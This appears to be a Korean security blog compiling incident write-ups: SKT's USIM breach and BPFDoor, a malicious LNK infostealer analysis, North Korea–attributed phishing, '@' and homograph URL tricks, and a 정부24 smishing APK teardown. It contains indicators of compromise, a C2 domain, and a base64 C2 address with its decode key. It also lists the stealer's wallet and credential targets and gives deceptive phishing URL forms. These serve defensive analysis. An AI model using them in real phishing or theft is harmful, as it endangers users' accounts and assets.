이커머스 피싱은 한국의 온라인 쇼핑 시장 성장과 함께 점점 더 심각한 문제로 대두되고 있습니다. 가짜 쇼핑몰, 피싱 이메일, 소셜 미디어 광고 등 다양한 수법을 통해 사용자들을 속이는 이 사기는 금전적 손실뿐만 아니라 개인 정보 유출의 위험도 동반합니다. Rogervi2018, LuxeDeLuxe 같은 사례는 이러한 위협의 현실성을 보여줍니다. 따라서 사용자들은 항상 신뢰할 수 있는 사이트에서만 거래하고, 의심스러운 링크나 메시지를 피해야 합니다. 피해를 입었다면 KISA 또는 경찰청에 즉시 신고하여 추가 피해를 방지하세요.

이커머스 피싱에 대한 인식을 높이고, 안전한 온라인 쇼핑 환경을 만드는 데 모두가 기여할 수 있습니다. 지속적인 경계와 교육이 중요합니다.

참고 URL

https://news.kbs.co.kr/news/pc/view/view.do?ncd=8174417
https://news.kbs.co.kr/news/pc/view/view.do?ncd=8174000
https://news.kbs.co.kr/news/pc/view/view.do?ncd=7988378

https://kbcapital.co.kr/aboutus/cmpgdnc/finLifeDtl.kbc?blbdSeqno=107256
https://m.news.nate.com/view/20240904n02812

2025년 선관위 웹사이트 과부하 사건과 자동화 점검의 위험성

카고형 — Tue, 29 Apr 2025 13:02:28 +0900

2025년 선관위 웹사이트 과부하 사건과 자동화 점검의 위험성

https://news.nate.com/view/20250423n37017

선관위 "3시간 사이버공격 받아"…경찰 수사 의뢰 : 네이트 뉴스

한눈에 보는 오늘 : 정치 - 뉴스 : 중앙선거관리위원회가 지난 22일 선관위 홈페이지 선거통계 시스템이 약 3시간 동안 사이버 공격을 받았다고 밝혔다. 선관위는 경찰에 수사를 의뢰하고 점검 체

news.nate.com

https://www.yna.co.kr/view/AKR20250428138400001

선관위 "과도 트래픽, 보안업체 점검 중 발생…외부공격 아냐" | 연합뉴스

(서울=연합뉴스) 최평천 조다운 기자 = 최근 중앙선거관리위원회 선거통계 시스템 서버에 과도한 트래픽이 감지된 일은 사이버 공격이 아니라 보안 ...

www.yna.co.kr

사건 요약

2025년 4월 22일 오후 2시 40분부터 약 3시간 동안 선관위 선거통계 시스템 서버에 과도한 트래픽이 발생하여 접속 장애가 발생했습니다. 당시 누군가가 홈페이지에 계속 접속해 서버 과부하를 유발한 정황이 포착되어 사이버 공격으로 의심받았습니다. 이에 선관위는 서버 접근을 차단하고 경찰에 수사를 의뢰했습니다.

그러나 이후 28일 자체 점검 결과, 과부하의 원인은 보안 진단 업체의 자동화 스크립트를 이용한 점검 방식 때문으로 밝혀졌습니다. 해당 업체는 기존의 수동 점검 방식과 달리 자동화 스크립트를 사용하였으며, 이로 인해 서버에 과도한 트래픽이 발생했습니다. 선관위는 이러한 점검 방식의 변경에 대해 사전에 통보받지 못한 것으로 전해졌습니다.

⚠️ 취약성 분석

1. 자동화 스크립트의 과도한 요청

자동화 스크립트는 보안 점검을 효율적으로 수행할 수 있는 도구이지만, 적절한 속도 제한 없이 사용될 경우 서버에 과도한 부하를 줄 수 있습니다. 이번 사건에서는 자동화 스크립트가 서버에 지속적으로 접속하여 과부하를 유발한 것으로 확인됩니다.

2. HTTP Flood 공격과의 유사성?

HTTP Flood 공격은 웹 서버에 정상적인 HTTP 요청을 대량으로 보내 서버 자원을 소모시키는 DDoS 공격의 한 형태입니다. 이번 사건에서 발생한 과부하 현상은 의도된 공격은 아니었지만, 결과적으로 HTTP Flood 공격과 유사한 효과를 나타내는 거 아닌가 생각 듭니다.

3. 서버의 방어 체계 미비?

'정보 보호시스템 모니터링을 통해 사이버 공격을 자체 인지했다. 이후 해당 IP를 차단'으로 보아 외부에서 작동시킨 걸로 생각이 되고 탐지 후 차단 했다고 전해집니다. 3시간 만에 정상 작동되었지만 향후 실제 공격 발생 시 더 큰 피해로 이어질 수 있다고 생각됩니다.

️ 2011년 DDoS 공격과의 비교

2011년, 한국의 주요 정부 기관과 금융 기관을 대상으로 대규모 DDoS 공격이 발생하여 큰 피해를 입었습니다. 당시 공격은 수많은 좀비 PC를 이용하여 대량의 트래픽을 발생시켜 서버를 마비시켰습니다.

이번 선관위 사이트 과부하 사건은 의도된 공격은 아니었지만, 결과적으로 유사한 형태의 서비스 중단을 초래하였습니다. 실제 공격과 같은 피해를 발생시킬 수 있음을 보여주는 사례 아닌가 생각해 보게 됩니다.

https://ko.wikipedia.org/wiki/2011%EB%85%84_%EC%9E%AC%EB%B3%B4%EA%B6%90%EC%84%A0%EA%B1%B0_%EC%82%AC%EC%9D%B4%EB%B2%84%ED%85%8C%EB%9F%AC_%EC%82%AC%EA%B1%B4

2011년 재보궐선거 사이버테러 사건 - 위키백과, 우리 모두의 백과사전

위키백과, 우리 모두의 백과사전. 2011년 재보궐선거 사이버테러 사건, 2011년 재보궐선거 디도스 사건 또는 속칭 10·26 부정선거 사건은 2011년 10월 26일 11시 20분 경 중앙선관위 홈페이지와 박원순

ko.wikipedia.org

https://n.news.naver.com/mnews/article/138/0001987395?sid=105

“선관위 DDoS 공격은 공씨 단독범행” …경찰 결론

- 총 5명 범행 가담…배후·선관위 내부자 관여·DB 연동 임의차단 흔적 발견 못해 [디지털데일리 이유지기자] 경찰은 지난 10.26 재보궐선거 당일 발생한 ...

n.news.naver.com

✅ 결론

보안 점검은 시스템의 취약점을 사전에 발견하고 보완하기 위한 필수적인 과정입니다. 그러나 이러한 점검이 적절한 절차와 환경에서 이루어지지 않을 경우, 오히려 서비스 중단과 같은 부작용을 초래할 수 있습니다.

이번 선관위 사이트 과부하 사건은 보안 점검의 중요성과 함께, 그 실행 방식에 대한 신중한 접근이 필요함을 일깨워주는 사례입니다. 과거의 DDoS 공격 사례를 교훈 삼아, 보다 철저한 보안 체계와 점검 절차를 마련해야 할 시점입니다.

SK텔레콤 유심 정보 유출 사고

카고형 — Mon, 28 Apr 2025 19:27:35 +0900

사건 개요

2025년 4월, SK텔레콤 내부 시스템에서 악성코드 침해 사고가 발생하여 일부 가입자의 유심(USIM) 정보가 유출되었다. 4월 19일 오후 11시경 악성코드가 탐지되었으며, 즉시 삭제 및 감염 장비 격리 조치가 이루어졌다. 이번에 유출된 정보는 USIM 고유식별번호(IMSI), 전화번호(MSISDN), 인증키 등이며, 주민등록번호, 주소, 금융 정보 등 민감한 정보는 유출되지 않은 것으로 확인됐다.

사고는 SKT의 가입자 정보 관리 시스템(HSS) 일부가 침해되면서 발생한 것으로 추정되며, 현재까지 유출 정보의 악용 사례는 보고되지 않았다.

SK텔레콤 및 정부 대응

SK텔레콤은 사고 인지 직후 악성코드를 제거하고, 해킹 의심 장비를 즉시 격리 조치했다. 고객 보호를 위해 4월 28일부터 전국 대리점에서 USIM 무상 교체를 시행했으며, 4월 19일부터 27일까지 자비로 교체한 고객에게는 비용을 환급할 계획을 밝혔다.

또한 비정상적인 인증 시도를 차단하는 FDS(Fraud Detection System)를 강화하고, 이동전화번호 무단 변경 방지를 위한 USIM 보호 서비스를 제공하고 있다.

정부도 즉각 대응에 나섰다. 과학기술정보통신부는 합동조사단을 구성해 사고 원인을 조사하고 있으며, 국가정보원, 경찰청 등 관계기관은 SKT의 대응조치를 점검하고 보안 체계 강화를 지시했다.

유심 정보 유출 이후 예상 2차 공격 시나리오

심스와핑(SIM Swapping)
공격자가 유출된 전화번호, IMSI, 인증키를 활용해 피해자의 전화번호를 탈취. 이후 2차 인증 문자(OTP 등)를 가로채 금융 계좌 탈취, SNS 탈취 공격 가능.
명의도용 및 금융사기
유출된 전화번호와 고유 식별번호를 활용하여 대출 신청, 신용카드 발급 등 금융 사기 시도.
위치추적 및 통신 감청
IMSI를 활용해 피해자의 실시간 위치 추적, 통신 감청 가능성.

[2차 공격 흐름 요약]

USIM 정보 유출 → SIM 스와핑 시도 → OTP/본인 인증 탈취 → 금융 계좌 접근 및 개인정보 탈취

BPFDoor 악성코드

이번 침해 사고에는 리눅스 서버 대상 스텔스형 백도어 악성코드인 BPFDoor가 사용된 것으로 분석되었다. BPFDoor는 중동과 아시아 지역을 대상으로 한 공격에 사용된 전력이 있으며, 매우 은밀하게 네트워크 포트 필터링을 우회하여 서버를 제어하는 특징을 가진다.

SK텔레콤 사고에서도 리눅스 서버의 특정 통신 포트가 악성코드에 의해 장악된 정황이 발견되었으며, 이를 통해 지속적인 통제 및 데이터 유출이 가능했던 것으로 보인다. BPFDoor는 기존 보안 솔루션 탐지를 우회할 수 있어, 전용 리눅스 보안 솔루션이 설치되지 않은 환경에서는 매우 높은 위협이 된다.

결론 및 시사점

이번 사고는 통신 인프라의 핵심 시스템 보안에 대한 경각심을 다시 한번 일깨운 사례다. 특히 리눅스 서버에 대한 전용 보안 솔루션 부재와, 침투 이후 탐지 지연 문제가 심각한 리스크로 부각됐다.

향후 과제로는 다음과 같은 대응이 필요하다:

리눅스 서버 대상 전용 백신·EDR 도입 및 정책 강화
통신사 핵심 시스템 접근 통제 및 모니터링 강화
통신망·USIM 관련 2차 인증 강화 (예: 인증 강화를 위한 별도 보안 토큰 도입)
통신사-금융사-정부 간 침해지표(IOC) 실시간 공유 체계 구축
소비자 대상 보안 교육 및 유심 보호 서비스 가입 촉진

또한 개인 사용자 역시 유심 보호 서비스 가입, 이중 인증 활성화, 의심스러운 문자의 즉시 삭제 등 기본 보안 수칙을 철저히 준수해야 한다.

요약:

이번 침해는 단순 정보 유출이 아니라 통신 인프라 심층 침투를 통한 국가 기반시설 위협 가능성까지 내포한 사건이다.
보안업계와 정부는 사건의 심각성을 직시하고, 전면적인 통신 인프라 보안 강화에 착수해야 한다.
이용자는 "내 정보는 내가 지킨다"는 마음으로, 스스로 보안 수칙을 강화하는 노력이 절실하다.

[분석] 안랩 고지서를 위장하여 정보를 탈취하는 악성 LNK

카고형 — Wed, 23 Apr 2025 07:51:33 +0900

[분석] 안랩 고지서를 위장하여 정보를 탈취하는 악성 LNK

악성코드 특성: 키로깅, 클립보드 데이터 수집, 웹 브라우저 데이터(로그인 정보, 쿠키) 탈취 기능을 보유.
목표: 한국 사용자, 특히 세금 고지서를 클릭하도록 유도하여 가상 자산 데이터, 브라우저 데이터, GPKI 및 NPKI 인증서, 이메일 파일 등을 탈취.
유포 방식: 이메일 피싱, 클라우드 스토리지(구글 드라이브, 원드라이브) 링크, 매크로 포함 MS 워드/엑셀 문서.

실행과정

LNK 파일이 실행되면 다음과 같은 과정으로 감염이 진행됩니다:

초기 실행: LNK 파일이 temp 폴더에 HTA 파일을 다운로드.
ZIP 파일 포함: HTA 파일은 ZIP 파일을 포함하며, ZIP 안에는 다음 파일이 포함됨:
- 1.log, 2.log (악성 파일, Base64 인코딩된 PowerShell 스크립트)
- 1.ps1, 1.vbs (보조 파일)
악성 동작:
- 1.log: 정보 수집 및 명령 실행. 주요 함수:
  - UploadFile: 파일 업로드
  - Unprotect-Data: 데이터 복호화
  - GetExWFile: 파일 목록 수집
  - GetBrowserData: 브라우저 데이터 수집
  - Init, DownloadFile, CreateFileList, RegisterTask, Send, Get-ShortcutTargetPath, RecentFiles, Work 등.
- 2.log: 키로깅 및 클립보드 데이터 수집. 주요 함수:
  - Keylog: 키보드 입력 기록.

탈취 대상 데이터

파일 확장자: txt, doc, csv, doc, docx, xls, xlsx, pdf, hwp, hwpx, jpg, jpeg, png, rar, zip, alz, eml, ldb, log
특정 파일 이름: wallet, UTC–, blockchain, keystore, privatekey, coin, metamask, phrase, ledger, password, myether
추가 데이터: GPKI, NPKI 인증서, 이메일 파일, 브라우저 로그인 정보, 쿠키.

virustotal 정보

코드 분석

특히 세금 고지서를 클릭하도록 유도하여 가상 자산 데이터, 브라우저 데이터, GPKI 및 NPKI 인증서, 이메일 파일 등을 정보 탈취

특정 폴더에 hta파일 다운로드 및 실행

LNK 파일

난독화 된 스크립트

VBScript 'Msgbox'를 이용하여 문자열 추출하여 확인할 수 있다.

Msgbox ss

해제된 난독화코드

해제된 스크립트를 보면 특정 문자열을 읽고 특정 폴더에 PDF 파일과 zip파일을 드롭하고 실행하는 것을 확인할 수 있다.

첫 번째 'JVBERi0xLj' 문자열을 읽고 해당 부분에서 '고지정보서'라는 미끼 문서를 보여준다.

두번쨰도 'UEsDBBQAA' 문자열을 비교하고 특정 폴더에 저장 후 zip파일을 풀고 안에 있는 파일을 실행 한다.

1.ps1 파일에 인자 값으로 1.log(base64 인코딩)를 받아서 실행 디코드 하게되면 powershell코드가 보인다.

[1.ps1] 파일 실행 1

[1.log] base64 인코딩 된 문자열

파일 함수 및 기능 정리

1.log	UploadFile	공격자 서버로 파일 전송
	Unprotect-Data	암호화된 브라우저 정보를 DPAPI를 이용해 복호화 및 수집
	GetExWFile	가상 자산 지갑 브라우저 확장 프로그램의 데이터 파일 수집
	GetBrowserData	브라우저(Edge, Chrome, Naver Whale, Firefox)의 로그인 데이터, 북마크, 확장 프로그램 데이터 수집
	Init	시스템 정보, 행정전자서명인증서(GPKI), 공동인증서(NPKI) 수집
	DownloadFile	파일 다운로드
	CreateFileList	특정 파일의 경로 수집 [대상 확장자]: txt, doc, csv, docx, xls, xlsx, pdf, hwp, hwpx, jpg, jpeg, png, rar, zip, alz, eml, ldb, log [대상 파일명]: wallet, UTC–, blockchain, keystore, privatekey, coin, metamask, phrase, ledger, password, myether
	RegisterTask	Run 키 등록을 통한 지속성 유지
	Send	수집된 데이터를 압축 후 UploadFile 함수를 통해 업로드
	Get-ShortcutTargetPath	바로가기(LNK) 파일의 대상 경로 획득
	RecentFiles	최근 열람한 문서 및 파일 경로 수집 (Recent 폴더의 LNK 파일 활용)
	Work	주기적으로 공격자 서버와 통신하며 추가 명령 수행 (명령어 실행, 파일 업로드/다운로드)
2.log	Keylog	키로깅 및 클립보드 데이터 수집

특정 환경 탐지 하는 부분은 문자열을 비교하고 특정 문자열이 매칭되면 종료하기 때문에 임의값을 추가하여 우회하였음

[1.log] 특정 환경 탐지시 종료

[1.log] Run 키 등록을 통한 지속성 유지

[1.log] 주기적으로 공격자 서버와 통신하며 추가 명령 수행 (명령어 실행, 파일 업로드다운로드)

[1.log] 시스템 정보, 행정전자서명인증서(GPKI), 공동인증서(NPKI) 수집

[1.log] 다수의 가상 자산 지갑(Wallet) 브라우저 확장 프로그램의 데이터 파일 수집

[1.log] 브라우저(Edge, Chrome, Naver Whale, Firefox)의 로그인 데이터, 북마크, 확장 프로그램 데이터 파일 수집

[2.log] 키로깅

정보 수집 후 특정 서버에 정보 유출

네트워크

와이어 샤크에서 dns.qry.name == "srvdown.ddns.net" 입력해서 찾음

IOC 관련

https[:]//cdn[.]glitch[.]global/2eefa6a0-44ff-4979-9a9c-689be652996d/wsoj[.]hta

0DD2D15B3A13E7C7728997084BD6FB65

https://asec.ahnlab.com/ko/87616/

고지서를 위장하여 정보를 탈취하는 악성 LNK - ASEC

AhnLab SEcurity intelligence Center(ASEC)에서는 최근 사용자 정보를 탈취하는 악성 LNK 파일이 국내 사용자를 대상으로 유포 중인 정황을 확인하였다. 해당 유형은 가상자산 관련 데이터, 브라우저 데이터

asec.ahnlab.com

'방첩사 계엄문건' 사칭 북한 소행 추정 피싱 공격

카고형 — Fri, 18 Apr 2025 01:38:30 +0900

방첩사 계엄문건 사칭… 북한 소행 추정 피싱 공격

최근 경찰청은 작년 말에 북한의 소행으로 추정되는 사이버 공격에 대해 긴급 보도자료를 통해 경고를 내렸습니다. 이 공격은 대한민국 방첩사 계엄문건을 사칭한 문서와 피싱 URL을 이용해 악성 행위를 유도한 사례로, 단순한 피싱을 넘어선 사회공학 기반 공격이었습니다.

공격 방식 요약

공격자는 피싱 메일 혹은 메시지를 통해 다음과 같은 방식으로 사용자를 속였습니다:

문서 사칭: ‘방첩사 계엄문건’이라는 매우 자극적인 제목을 사용
URL 기반 피싱: http://naver.com@phishingsite.com 형태와 타이포스쿼팅(Typosquatting) 또는 홈그래핑(Homograph Attack)을 활용
정보 탈취: 아이디와 비밀번호(계정정)등 중요 정보 탈취
북한발 소행 추정 사건의 이유 :
- 기존 북한발 서버이용
- 사칭 메일 수신자가 통일, 안보, 국방, 외교분야 종사자인 점
- 범행 근원지 IP주소가 북한과 접경지역에 할당
- 탈북자 및 군 관련 정보 수집
- 인터넷 검색기록에서 북한식 어휘가 다수 확인된 점

공격 개요도와 사례

첨부된 이미지와 같이, 공격자는 단계별로 사용자를 속이는 치밀한 구조를 갖추고 있습니다

▲북한발 사칭 이메일 공격 개요도 [자료: 경찰청]

▲ 북한발 사칭 전자우편 사례 [자료: 경찰청]

실제 공격의 이용된 기법

타이포스쿼팅: 사용자가 도메인을 오타 낼 가능성을 노리고 유사 도메인을 등록해 악성 사이트로 유도
홈그래핑(HomographAttack): 도메인에 비슷한 외형의 유니코드 문자를 사용해 정상 도메인처럼 보이게 조작
인증(로그인) 정보를 포함한 URL: 로그인 ID를 이용하여 사칭하여 피싱페이지로 유도

▲사칭용 전자우편 및 피싱 사이트 주소 사례 [자료: 경찰청]

공격 기법 상세 분석 + 예시

1. 타이포스쿼팅 (Typosquatting)

개념: 사용자의 오타를 노려 유사 도메인을 등록하고, 해당 사이트에 악성 콘텐츠나 피싱 페이지를 배포하는 방식.

예시:

정상 도메인: www.naver.com
공격 도메인: www.nvaer.com, www.naver.co.kr.login-page.com

www.naver.co.kr.login-page.com는 겉보기엔 naver.co.kr의 서브도메인처럼 보이지만, 실제 도메인은 login-page.com입니다.

실제 피해 가능 시나리오:

피해자가 사칭된 링크 클릭 → 가짜 로그인 페이지 등장
사용자 ID/PW 입력 → 즉시 공격자 서버로 전송 → 계정 탈취

2. 홈그래프 공격 (Homograph Attack)

개념: 도메인 이름에 유사하게 보이는 유니코드 문자를 삽입하여, 사람 눈에는 똑같이 보이지만 실제로는 다른 도메인으로 연결되도록 하는 기법.

예시:

정상 도메인: www.paypal.com
공격 도메인: www.pаypal.com ← 여기서 첫 번째 'a'는 라틴 문자가 아니라 키릴 문자입니다.

대부분의 사용자 눈에는 구분이 안 되지만, 실제 주소는 완전히 다른 공격자의 도메인입니다.

실제 사용 사례:

공격자는 이 기법으로 가짜 금융기관, 포털, 전자정부 사이트 등을 만들어 피싱 메시지를 통해 유포
한국에서도 유사 방식으로. kr을.рｋ(유니코드 조합)처럼 위장한 사례가 탐지된 바 있음

참고 사이트

URL 기본 구조와 @을 활용한 피싱 기법

카고형 — Wed, 16 Apr 2025 19:50:27 +0900

URL 기본 구조와 @을 활용한 피싱 기법

웹에서 자원에 접근할 때 사용하는 주소인 **URL (Uniform Resource Locator)**은 다음과 같은 구성 요소를 가집니다.

URL 기본 구성 요소

Scheme (스키마)	자원에 접근하는 방식 (프로토콜)	http, https, ftp, mailto 등
Host (호스트)	자원이 위치한 서버의 도메인 또는 IP	www.example.com
Port (포트)	생략 가능하며 서버의 특정 포트를 지정	:443, :21 등
Path (경로)	자원에 대한 위치	/files/image.jpg
Query (쿼리)	추가 파라미터 정보 (?key=value)	?id=123&view=full
Fragment (프래그먼트)	문서 내 특정 위치를 지정 (#)	#section2

예시 URL:
https://www.example.com:443/path/to/page?id=123#comments

인증(로그인) 정보를 포함한 URL – 그리고 피싱 위험

전통적으로 FTP나 HTTP 인증에 사용되던 URL 포맷:

protocol://username:password@domain/path

예시:

ftp://user:pass@ftp.example.com/files

⚠️ 하지만 다음과 같은 피싱 공격에 악용될 수 있습니다:

https://naver.com@phishingsite.com/login

실제로 접속되는 사이트는 phishingsite.com
앞부분의 naver.com은 사용자 신뢰 유도를 위한 미끼
브라우저 주소창의 @ 이후가 진짜 도메인입니다.

https://user:password@domain.com 구조는 @ 기준 오른쪽이 실제 접속 도메인입니다.

요약: 왜 중요한가?

✔️ 피싱 피해 예방	신뢰할 수 있는 도메인인지, 구조상 이상이 없는지 반드시 확인
✔️ 인증 정보 유출 방지	URL에 아이디·비밀번호를 포함하면 로그를 통해 유출 위험
✔️ 브라우저 정책과의 충돌 방지	최신 브라우저는 이런 URL 형식을 경고하거나 차단함

️ 실제 피싱 공격 방식:

피싱 URL: https://naver.com @cago-young.tistory.com

사용자에게는 공백을 이용하여 네이버 도메인인 것처럼 속임
실제 접속은 cago-young.tistory.com로 이루어짐
해당 페이지는 네이버 로그인 UI를 모방한 가짜 로그인 페이지가 될수 있음

'방첩사 계엄문건' 사칭 북한 소행 추정 피싱 공격

방첩사 계엄문건 사칭… 북한 소행 추정 피싱 공격최근 경찰청은 작년 말에 북한의 소행으로 추정되는 사이버 공격에 대해 긴급 보도자료를 통해 경고를 내렸습니다. 이 공격은 대한민국 방첩

cago-young.tistory.com

✅ 알고 넘어가자:

주소창의 도메인 @ 이후가 실제 접속 도메인임을 반드시 인지
외부 링크 클릭 금지, 직접 확인해서 들어가는 습관
https 브라우저의 SSL 인증서 확인 (자물쇠 아이콘)

[악성 앱] 정부24 사칭 스미싱 악성앱 분석 (25.02.25)

카고형 — Mon, 3 Mar 2025 06:08:00 +0900

이번에 직접 핸드폰으로 문자가 와서 확인해 봤는데 이전에도 비슷한 유형에 피싱 사이트를 통해 악성앱을 유포시켰습니다. 22년도에는 교통위반등 운전자 관련 위주로 스미싱이 배포되어 왔고 23-24년도에는 쓰레기 무단투기등 생활형 범법행위 관련으로 위주로 유포 되었습니다. 다시 돌아와서 아래 키워드를 보면 이제 다시 교통 관련 스미싱이 보이기 시작한거 같습니다.

경찰청 교통민원 스미싱 증가! 피싱 사이트 유포 (25.02.25)

스미싱 문구

[국외발신]
{-경찰청교통민원-}
교통법위반(사전안내서)발부됨 확인바람: http://URL

스미싱 문자

정부24 관련 현재 배포되고 있는 스미싱 문구는 "교통법규위반(사전안내서)발부됨" 내용이 포함되어 스미싱 문자를 배포하고 있습니다.

정부 24(구 민원 24) 사칭을 하여 최근에는 쓰레기, 무단투기등 생활 범법행위 위주의 문구를 사용한 것으로 알고 있었는데

최근에 다시 운전자관련 하여 범칙금, 범법 행위 관련으로 배포되는 것으로 보아 "과태료", "범칙금", "운전면허", "고지서", "통지서", "벌점", "신호 위반", "과속", "불법 주정차", "불법 유턴", "보행자 보호 의무 위반"등 이 포함된 문구가 다시 배포될 것으로 생각됩니다.

정상 배포 방식

정부에서 앱 다운로드 하는 경우는 특이사항이 아닌 이상 요구 하지 않을 것으로 생각됩니다.

정상 앱 설치

※ 정상 배포방식은 원스토어, 구글플래이 해당 사이트(어플)를 통해서만 배포합니다.

피싱 사이트 접속 화면

이전의 피싱 사이트는 번호 입력 - 본인인증 - 앱 다운 순으로 진행됐었는데 요번에는 번호 입력, 본인인증이 없이 피싱 페이지에서 버튼을 누르면 다운로드되는 형태로 바뀌었습니다.

피싱 사이트 페이지

피싱 사이트 html 분석

피싱 사이트 스크립트

해당 피싱 사이트에서 버튼을 클릭하게 되면 userAgent 값으로 IOS 또는 mac 환경에서 접속 시 해당 파일을 받을 수 없고 다른 환경으로 접속 시 특정 url로 접속하게 되어 apk 파일을 다운로드하게 됩니다.

해당 피싱 사이트는 사칭 사이트인 정부24 홈페이지와는 이전처럼 비슷하지는 않아 보입니다.

해당 스미싱 문자에 포함된 URL 주소로 접속하면 정부 24(구 민원 24) 사칭 피싱 사이트로 접속하게 되며 해당 페이지에서 "정부 24 어플 다운로드" 버튼을 클릭하면 APK 파일을 설치하게 되며, 해당 앱은 악성 앱입니다.

리소스 분석

APK 파일 정보

App Name: GO24
App Version : 1.0.1
Package Name : com.mpgd.pompbsys
MD5 : 6a6051d8963ba2b27c2766bf34978774
SHA-1 : 7b3fd1eb5346922473c860f74885c040eec332d1
SHA-256 : 01e6619f0a6472f9129b203726187b3d769cbc9107748988ec1a70bdd65f1385
Vhash : 7547c30674db4037af1bccb215bc5159

VirusTotal 탐지 결과

ESET-NOD32 : A Variant Of Android/TrojanDownloader.Agent.ATQ
Kaspersky : HEUR:Trojan-Downloader.AndroidOS.Banjeon.e

virustotal 탐지 내역

Android Manifest

Activities 1 , Services 0, Receivers 1, Providers 2를 확인할 수 있습니다.

aapt dump xmlstrings [ ].apk AndroidManifest.xml

<?xml version="1.0" encoding="utf-8"?>
<resources>
    <string name="abc_action_bar_up_description">Navigate up</string>
    <string name="abc_action_mode_done">Done</string>
    <string name="abc_capital_off">OFF</string>
    <string name="abc_capital_on">ON</string>
    <string name="abc_menu_alt_shortcut_label">Alt+</string>
    <string name="abc_menu_ctrl_shortcut_label">Ctrl+</string>
    <string name="abc_menu_delete_shortcut_label">delete</string>
    <string name="abc_menu_enter_shortcut_label">enter</string>
    <string name="abc_menu_function_shortcut_label">Function+</string>
    <string name="abc_menu_meta_shortcut_label">Meta+</string>
    <string name="abc_menu_shift_shortcut_label">Shift+</string>
    <string name="abc_menu_space_shortcut_label">space</string>
    <string name="abc_menu_sym_shortcut_label">Sym+</string>
    <string name="abc_prepend_shortcut_label">Menu+</string>
    <string name="abc_search_hint">Search…</string>
    <string name="abc_searchview_description_clear">Clear query</string>
    <string name="abc_searchview_description_search">Search</string>
    <string name="abc_searchview_description_submit">Submit query</string>
    <string name="abc_searchview_description_voice">Voice search</string>
    <string name="abc_toolbar_collapse_description">Collapse</string>
    <string name="androidx_startup">androidx.startup</string>
    <string name="app_name">GO24</string>
    <string name="baseUrl">UEREZWxNUnYtMjA5LjE0MS41My44MQ==</string>
    <string name="bottom_sheet_behavior">com.google.android.material.bottomsheet.BottomSheetBehavior</string>
    <string name="bottomsheet_action_collapse">Collapse the bottom sheet</string>
    <string name="bottomsheet_action_expand">Expand the bottom sheet</string>
    <string name="bottomsheet_action_expand_halfway">Expand halfway</string>
    <string name="bottomsheet_drag_handle_clicked">Drag handle double-tapped</string>
    <string name="bottomsheet_drag_handle_content_description">Drag handle</string>
    <string name="character_counter_content_description">Characters entered %1$d of %2$d</string>
    <string name="character_counter_overflowed_content_description">Character limit exceeded %1$d of %2$d</string>
    <string name="character_counter_pattern">%1$d/%2$d</string>
    <string name="clear_text_end_icon_content_description">Clear text</string>
    <string name="decodeKey">PDDelMRv-</string>
    <string name="error_a11y_label">Error: invalid</string>
    <string name="error_icon_content_description">Error</string>
    <string name="exposed_dropdown_menu_content_description">Show dropdown menu</string>
    <string name="item_view_role_description">Tab</string>
    <string name="m3_ref_typeface_brand_regular">sans-serif</string>
    <string name="m3_ref_typeface_plain_medium">sans-serif-medium</string>
    <string name="m3_ref_typeface_plain_regular">sans-serif</string>
    <string name="m3_sys_motion_easing_emphasized">path(M 0,0 C 0.05, 0, 0.133333, 0.06, 0.166666, 0.4 C 0.208333, 0.82, 0.25, 1, 1, 1)</string>
    <string name="m3_sys_motion_easing_emphasized_path_data">M 0,0 C 0.05, 0, 0.133333, 0.06, 0.166666, 0.4 C 0.208333, 0.82, 0.25, 1, 1, 1</string>
    <string name="m3_sys_motion_easing_legacy_accelerate">cubic-bezier(0.4, 0, 1, 1)</string>
    <string name="m3_sys_motion_easing_legacy_decelerate">cubic-bezier(0, 0, 0.2, 1)</string>
    <string name="m3_sys_motion_easing_linear">cubic-bezier(0, 0, 1, 1)</string>
    <string name="m3_sys_motion_easing_standard">cubic-bezier(0.2, 0, 0, 1)</string>
    <string name="material_clock_display_divider">:</string>
    <string name="material_clock_toggle_content_description">Select AM or PM</string>
    <string name="material_motion_easing_accelerated">cubic-bezier(0.4, 0.0, 1.0, 1.0)</string>
    <string name="material_motion_easing_decelerated">cubic-bezier(0.0, 0.0, 0.2, 1.0)</string>
    <string name="material_motion_easing_emphasized">path(M 0,0 C 0.05, 0, 0.133333, 0.06, 0.166666, 0.4 C 0.208333, 0.82, 0.25, 1, 1, 1)</string>
    <string name="material_motion_easing_linear">cubic-bezier(0.0, 0.0, 1.0, 1.0)</string>
    <string name="material_motion_easing_standard">cubic-bezier(0.4, 0.0, 0.2, 1.0)</string>
    <string name="material_timepicker_am">AM</string>
    <string name="material_timepicker_pm">PM</string>
    <string name="mtrl_checkbox_button_icon_path_checked">M14,18.2 11.4,15.6 10,17 14,21 22,13 20.6,11.6z</string>
    <string name="mtrl_checkbox_button_icon_path_group_name">icon</string>
    <string name="mtrl_checkbox_button_icon_path_indeterminate">M13.4,15 11,15 11,17 13.4,17 21,17 21,15z</string>
    <string name="mtrl_checkbox_button_icon_path_name">icon path</string>
    <string name="mtrl_checkbox_button_path_checked">M23,7H9C7.9,7,7,7.9,7,9v14c0,1.1,0.9,2,2,2h14c1.1,0,2-0.9,2-2V9C25,7.9,24.1,7,23,7z</string>
    <string name="mtrl_checkbox_button_path_group_name">button</string>
    <string name="mtrl_checkbox_button_path_name">button path</string>
    <string name="mtrl_checkbox_button_path_unchecked">M23,7H9C7.9,7,7,7.9,7,9v14c0,1.1,0.9,2,2,2h14c1.1,0,2-0.9,2-2V9C25,7.9,24.1,7,23,7z M23,23H9V9h14V23z</string>
    <string name="mtrl_checkbox_state_description_checked">Checked</string>
    <string name="mtrl_checkbox_state_description_indeterminate">Partially checked</string>
    <string name="mtrl_checkbox_state_description_unchecked">Not checked</string>
    <string name="mtrl_chip_close_icon_content_description">Remove %1$s</string>
    <string name="mtrl_picker_a11y_next_month">Change to next month</string>
    <string name="mtrl_picker_a11y_prev_month">Change to previous month</string>
    <string name="mtrl_picker_cancel">Cancel</string>
    <string name="mtrl_picker_confirm">OK</string>
    <string name="mtrl_picker_day_of_week_column_header">%1$s</string>
    <string name="mtrl_picker_navigate_to_current_year_description">Navigate to current year %1$d</string>
    <string name="mtrl_picker_navigate_to_year_description">Navigate to year %1$d</string>
    <string name="mtrl_picker_save">Save</string>
    <string name="mtrl_picker_toggle_to_calendar_input_mode">Switch to calendar input mode</string>
    <string name="mtrl_picker_toggle_to_day_selection">Tap to switch to Calendar view</string>
    <string name="mtrl_picker_toggle_to_text_input_mode">Switch to text input mode</string>
    <string name="mtrl_picker_toggle_to_year_selection">Tap to switch to year view</string>
    <string name="mtrl_switch_thumb_group_name">circle_group</string>
